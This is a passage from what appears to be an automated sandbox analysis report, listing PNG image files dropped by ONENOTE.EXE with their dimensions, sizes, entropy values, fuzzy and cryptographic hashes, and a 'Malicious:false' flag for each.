                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
